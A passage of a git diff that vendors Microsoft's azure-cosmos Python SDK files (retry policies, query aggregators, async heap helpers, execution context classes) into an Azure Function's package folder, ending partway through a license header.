the document to retrieve the partitionKey specified in the partition key parts + def _retrieve_partition_key(self, partition_key_parts, document, is_system_key): + expected_matchCount = len(partition_key_parts) + matchCount = 0 + partitionKey = document + + for part in partition_key_parts: + # At any point if we don't find the value of a sub-property in the document, we return as Undefined + if part not in partitionKey: + return self._return_undefined_or_empty_partition_key(is_system_key) + + partitionKey = partitionKey.get(part) + matchCount += 1 + # Once we reach the "leaf" value(not a dict), we break from loop + if not isinstance(partitionKey, dict): + break + + # Match the count of hops we did to get the partitionKey with the length of + # partition key parts and validate that it's not a dict at that level + if (matchCount != expected_matchCount) or isinstance(partitionKey, dict): + return self._return_undefined_or_empty_partition_key(is_system_key) + + return partitionKey + + def refresh_routing_map_provider(self): + # re-initializes the routing map provider, effectively refreshing the current partition key range cache + self._routing_map_provider = routing_map_provider.SmartRoutingMapProvider(self) + + def _UpdateSessionIfRequired(self, request_headers, response_result, response_headers): + """ + Updates session if necessary. + + :param dict response_result: + :param dict response_headers: + :param dict response_headers + + :return: + None, but updates the client session if necessary. + + """ + + # if this request was made with consistency level as session, then update the session + if response_result is None or response_headers is None: + return + + is_session_consistency = False + if http_constants.HttpHeaders.ConsistencyLevel in request_headers: + if documents.ConsistencyLevel.Session == request_headers[http_constants.HttpHeaders.ConsistencyLevel]: + is_session_consistency = True + + if is_session_consistency: + # update session + self.session.update_session(response_result, response_headers) + + @staticmethod + def _return_undefined_or_empty_partition_key(is_system_key): + if is_system_key: + return _Empty + return _Undefined diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_default_retry_policy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_default_retry_policy.py new file mode 100644 index 0000000..245c43f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_default_retry_policy.py @@ -0,0 +1,80 @@ +# The MIT License (MIT) +# Copyright (c) 2017 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for connection reset retry policy implementation in the Azure +Cosmos database service. +""" +from . import http_constants + +# pylint: disable=protected-access + + +class DefaultRetryPolicy(object): + + error_codes = http_constants._ErrorCodes + CONNECTION_ERROR_CODES = [ + error_codes.WindowsInterruptedFunctionCall, + error_codes.WindowsFileHandleNotValid, + error_codes.WindowsPermissionDenied, + error_codes.WindowsBadAddress, + error_codes.WindowsInvalidArgumnet, + error_codes.WindowsResourceTemporarilyUnavailable, + error_codes.WindowsOperationNowInProgress, + error_codes.WindowsAddressAlreadyInUse, + error_codes.WindowsConnectionResetByPeer, + error_codes.WindowsCannotSendAfterSocketShutdown, + error_codes.WindowsConnectionTimedOut, + error_codes.WindowsConnectionRefused, + error_codes.WindowsNameTooLong, + error_codes.WindowsHostIsDown, + error_codes.WindowsNoRouteTohost, + error_codes.LinuxConnectionReset, + ] + + def __init__(self, *args): + self._max_retry_attempt_count = 10 + self.current_retry_attempt_count = 0 + self.retry_after_in_milliseconds = 1000 + self.args = args + + def needsRetry(self, error_code): + if error_code in DefaultRetryPolicy.CONNECTION_ERROR_CODES: + if self.args: + if (self.args[3].method == "GET") or (http_constants.HttpHeaders.IsQuery in self.args[3].headers) \ + or (http_constants.HttpHeaders.IsQueryPlanRequest in self.args[3].headers): + return True + return False + return True + return False + + def ShouldRetry(self, exception): + """Returns true if should retry based on the passed-in exception. + + :param (exceptions.CosmosHttpResponseError instance) exception: + :rtype: boolean + + """ + if (self.current_retry_attempt_count < self._max_retry_attempt_count) and self.needsRetry( + exception.status_code + ): + self.current_retry_attempt_count += 1 + return True + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_endpoint_discovery_retry_policy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_endpoint_discovery_retry_policy.py new file mode 100644 index 0000000..d9a922f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_endpoint_discovery_retry_policy.py @@ -0,0 +1,100 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for endpoint discovery retry policy implementation in the +Azure Cosmos database service. +""" + +import logging +from azure.cosmos.documents import _OperationType + +logger = logging.getLogger(__name__) +logger.setLevel(logging.INFO) +log_formatter = logging.Formatter("%(levelname)s:%(message)s") +log_handler = logging.StreamHandler() +log_handler.setFormatter(log_formatter) +logger.addHandler(log_handler) + + +class EndpointDiscoveryRetryPolicy(object): + """The endpoint discovery retry policy class used for geo-replicated database accounts + to handle the write forbidden exceptions due to writable/readable location changes + (say, after a failover). + """ + + Max_retry_attempt_count = 120 + Retry_after_in_milliseconds = 1000 + + def __init__(self, connection_policy, global_endpoint_manager, *args): + self.global_endpoint_manager = global_endpoint_manager + self._max_retry_attempt_count = EndpointDiscoveryRetryPolicy.Max_retry_attempt_count + self.failover_retry_count = 0 + self.retry_after_in_milliseconds = EndpointDiscoveryRetryPolicy.Retry_after_in_milliseconds + self.connection_policy = connection_policy + self.request = args[0] if args else None + # clear previous location-based routing directive + if self.request: + self.request.clear_route_to_location() + + # Resolve the endpoint for the request and pin the resolution to the resolved endpoint + # This enables marking the endpoint unavailability on endpoint failover/unreachability + self.location_endpoint = self.global_endpoint_manager.resolve_service_endpoint(self.request) + self.request.route_to_location(self.location_endpoint) + + def ShouldRetry(self, exception): # pylint: disable=unused-argument + """Returns true if should retry based on the passed-in exception. + + :param (exceptions.CosmosHttpResponseError instance) exception: + :rtype: boolean + + """ + if not self.connection_policy.EnableEndpointDiscovery: + return False + + if self.failover_retry_count >= self.Max_retry_attempt_count: + return False + + self.failover_retry_count += 1 + + if self.location_endpoint: + if _OperationType.IsReadOnlyOperation(self.request.operation_type): + # Mark current read endpoint as unavailable + self.global_endpoint_manager.mark_endpoint_unavailable_for_read(self.location_endpoint) + else: + self.global_endpoint_manager.mark_endpoint_unavailable_for_write(self.location_endpoint) + + # set the refresh_needed flag to ensure that endpoint list is + # refreshed with new writable and readable locations + self.global_endpoint_manager.refresh_needed = True + + # clear previous location-based routing directive + self.request.clear_route_to_location() + + # set location-based routing directive based on retry count + # simulating single master writes by ensuring usePreferredLocations + # is set to false + self.request.route_to_location_with_preferred_location_flag(self.failover_retry_count, False) + + # Resolve the endpoint for the request and pin the resolution to the resolved endpoint + # This enables marking the endpoint unavailability on endpoint failover/unreachability + self.location_endpoint = self.global_endpoint_manager.resolve_service_endpoint(self.request) + self.request.route_to_location(self.location_endpoint) + return True diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__init__.py new file mode 100644 index 0000000..c8cc2af --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__init__.py @@ -0,0 +1,20 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..856c1f7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/aggregators.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/aggregators.cpython-39.pyc new file mode 100644 index 0000000..cf6cfee Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/aggregators.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/base_execution_context.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/base_execution_context.cpython-39.pyc new file mode 100644 index 0000000..52da105 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/base_execution_context.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/document_producer.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/document_producer.cpython-39.pyc new file mode 100644 index 0000000..f481612 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/document_producer.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/endpoint_component.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/endpoint_component.cpython-39.pyc new file mode 100644 index 0000000..7b9c281 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/endpoint_component.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/execution_dispatcher.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/execution_dispatcher.cpython-39.pyc new file mode 100644 index 0000000..0cbef92 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/execution_dispatcher.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/multi_execution_aggregator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/multi_execution_aggregator.cpython-39.pyc new file mode 100644 index 0000000..0ffd06d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/multi_execution_aggregator.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/query_execution_info.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/query_execution_info.cpython-39.pyc new file mode 100644 index 0000000..7b7a3d6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/query_execution_info.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aggregators.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aggregators.py new file mode 100644 index 0000000..5b1eef1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aggregators.py @@ -0,0 +1,115 @@ +# The MIT License (MIT) +# Copyright (c) 2017 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for aggregation queries implementation in the Azure Cosmos +database service. +""" +from abc import abstractmethod, ABCMeta +from azure.cosmos._execution_context.document_producer import _OrderByHelper + + +class _Aggregator(object): + __metaclass__ = ABCMeta + + @abstractmethod + def aggregate(self, other): + pass + + @abstractmethod + def get_result(self): + pass + + +class _AverageAggregator(_Aggregator): + def __init__(self): + self.sum = None + self.count = None + + def aggregate(self, other): + if other is None or not "sum" in other: + return + if self.sum is None: + self.sum = 0.0 + self.count = 0 + self.sum += other["sum"] + self.count += other["count"] + + def get_result(self): + if self.sum is None or self.count is None or self.count <= 0: + return None + return self.sum / self.count + + +class _CountAggregator(_Aggregator): + def __init__(self): + self.count = 0 + + def aggregate(self, other): + self.count += other + + def get_result(self): + return self.count + + +class _MinAggregator(_Aggregator): + def __init__(self): + self.value = None + + def aggregate(self, other): + if self.value is None: + self.value = other + else: + if _OrderByHelper.compare({"item": other}, {"item": self.value}) < 0: + self.value = other + + def get_result(self): + return self.value + + +class _MaxAggregator(_Aggregator): + def __init__(self): + self.value = None + + def aggregate(self, other): + if self.value is None: + self.value = other + else: + if _OrderByHelper.compare({"item": other}, {"item": self.value}) > 0: + self.value = other + + def get_result(self): + return self.value + + +class _SumAggregator(_Aggregator): + def __init__(self): + self.sum = None + + def aggregate(self, other): + if other is None: + return + if self.sum is None: + self.sum = other + else: + self.sum += other + + def get_result(self): + return self.sum diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__init__.py new file mode 100644 index 0000000..a9253df --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__init__.py @@ -0,0 +1,20 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..e019d08 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/_queue_async_helper.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/_queue_async_helper.cpython-39.pyc new file mode 100644 index 0000000..b63c898 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/_queue_async_helper.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/base_execution_context.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/base_execution_context.cpython-39.pyc new file mode 100644 index 0000000..b9624e9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/base_execution_context.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/document_producer.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/document_producer.cpython-39.pyc new file mode 100644 index 0000000..d7303c9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/document_producer.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/endpoint_component.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/endpoint_component.cpython-39.pyc new file mode 100644 index 0000000..2061164 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/endpoint_component.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/execution_dispatcher.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/execution_dispatcher.cpython-39.pyc new file mode 100644 index 0000000..81dc394 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/execution_dispatcher.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/multi_execution_aggregator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/multi_execution_aggregator.cpython-39.pyc new file mode 100644 index 0000000..017576a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/multi_execution_aggregator.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/_queue_async_helper.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/_queue_async_helper.py new file mode 100644 index 0000000..3ee1865 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/_queue_async_helper.py @@ -0,0 +1,74 @@ +# The MIT License (MIT) +# Copyright (c) 2022 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +async def heap_push(heap, item, document_producer_comparator): + """Push item onto heap, maintaining the heap invariant.""" + heap.append(item) + await _sift_down(heap, document_producer_comparator, 0, len(heap) - 1) + + +async def heap_pop(heap, document_producer_comparator): + """Pop the smallest item off the heap, maintaining the heap invariant.""" + last_elt = heap.pop() # raises appropriate IndexError if heap is empty + if heap: + return_item = heap[0] + heap[0] = last_elt + await _sift_up(heap, document_producer_comparator, 0) + return return_item + return last_elt + + +async def _sift_down(heap, document_producer_comparator, start_pos, pos): + new_item = heap[pos] + # Follow the path to the root, moving parents down until finding a place + # new_item fits. + while pos > start_pos: + parent_pos = (pos - 1) >> 1 + parent = heap[parent_pos] + if await document_producer_comparator.compare(new_item, parent) < 0: + # if new_item < parent: + heap[pos] = parent + pos = parent_pos + continue + break + heap[pos] = new_item + + +async def _sift_up(heap, document_producer_comparator, pos): + end_pos = len(heap) + start_pos = pos + new_item = heap[pos] + # Bubble up the smaller child until hitting a leaf. + child_pos = 2 * pos + 1 # leftmost child position + while child_pos < end_pos: + # Set child_pos to index of smaller child. + right_pos = child_pos + 1 + # if right_pos < end_pos and not heap[child_pos] < heap[right_pos]: + if right_pos < end_pos and not await document_producer_comparator.compare(heap[child_pos], heap[right_pos]) < 0: + child_pos = right_pos + # Move the smaller child up. + heap[pos] = heap[child_pos] + pos = child_pos + child_pos = 2 * pos + 1 + # The leaf at pos is empty now. Put new_item there, and bubble it up + # to its final resting place (by sifting its parents down). + heap[pos] = new_item + await _sift_down(heap, document_producer_comparator, start_pos, pos) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/base_execution_context.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/base_execution_context.py new file mode 100644 index 0000000..de2876d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/base_execution_context.py @@ -0,0 +1,170 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for query execution context implementation in the Azure Cosmos +database service. +""" + +from collections import deque +import copy + +from ...aio import _retry_utility_async +from ... import http_constants + +# pylint: disable=protected-access + + +class _QueryExecutionContextBase(object): + """ + This is the abstract base execution context class. + """ + + def __init__(self, client, options): + """ + :param CosmosClient client: + :param dict options: The request options for the request. + """ + self._client = client + self._options = options + self._is_change_feed = "changeFeed" in options and options["changeFeed"] is True + self._continuation = self._get_initial_continuation() + self._has_started = False + self._has_finished = False + self._buffer = deque() + + def _get_initial_continuation(self): + if "continuation" in self._options: + if "enableCrossPartitionQuery" in self._options: + raise ValueError("continuation tokens are not supported for cross-partition queries.") + return self._options["continuation"] + return None + + def _has_more_pages(self): + return not self._has_started or self._continuation + + async def fetch_next_block(self): + """Returns a block of results with respecting retry policy. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + :return: List of results. + :rtype: list + """ + if not self._has_more_pages(): + return [] + + if self._buffer: + # if there is anything in the buffer returns that + res = list(self._buffer) + self._buffer.clear() + return res + + # fetches the next block + return await self._fetch_next_block() + + async def _fetch_next_block(self): + raise NotImplementedError + + async def __aiter__(self): + """Returns itself as an iterator""" + return self + + async def __anext__(self): + """Return the next query result. + + :return: The next query result. + :rtype: dict + :raises StopAsyncIteration: If no more result is left. + """ + if self._has_finished: + raise StopAsyncIteration + + if not self._buffer: + + results = await self.fetch_next_block() + self._buffer.extend(results) + + if not self._buffer: + raise StopAsyncIteration + + return self._buffer.popleft() + + async def _fetch_items_helper_no_retries(self, fetch_function): + """Fetches more items and doesn't retry on failure + + :return: List of fetched items. + :rtype: list + """ + fetched_items = [] + # Continues pages till finds a non empty page or all results are exhausted + while self._continuation or not self._has_started: + if not self._has_started: + self._has_started = True + new_options = copy.deepcopy(self._options) + new_options["continuation"] = self._continuation + + (fetched_items, response_headers) = await fetch_function(new_options) + continuation_key = http_constants.HttpHeaders.Continuation + # Use Etag as continuation token for change feed queries. + if self._is_change_feed: + continuation_key = http_constants.HttpHeaders.ETag + # In change feed queries, the continuation token is always populated. The hasNext() test is whether + # there is any items in the response or not. + if not self._is_change_feed or fetched_items: + self._continuation = response_headers.get(continuation_key) + else: + self._continuation = None + if fetched_items: + break + return fetched_items + + async def _fetch_items_helper_with_retries(self, fetch_function): + async def callback(): + return await self._fetch_items_helper_no_retries(fetch_function) + + return await _retry_utility_async.ExecuteAsync(self._client, self._client._global_endpoint_manager, callback) + + +class _DefaultQueryExecutionContext(_QueryExecutionContextBase): + """ + This is the default execution context. + """ + + def __init__(self, client, options, fetch_function): + """ + :param CosmosClient client: + :param dict options: The request options for the request. + :param method fetch_function: + Will be invoked for retrieving each page + + Example of `fetch_function`: + + >>> def result_fn(result): + >>> return result['Databases'] + + """ + super(_DefaultQueryExecutionContext, self).__init__(client, options) + self._fetch_function = fetch_function + + async def _fetch_next_block(self): + while super(_DefaultQueryExecutionContext, self)._has_more_pages() and not self._buffer: + return await self._fetch_items_helper_with_retries(self._fetch_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/document_producer.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/document_producer.py new file mode 100644 index 0000000..0229fda --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/document_producer.py @@ -0,0 +1,274 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person 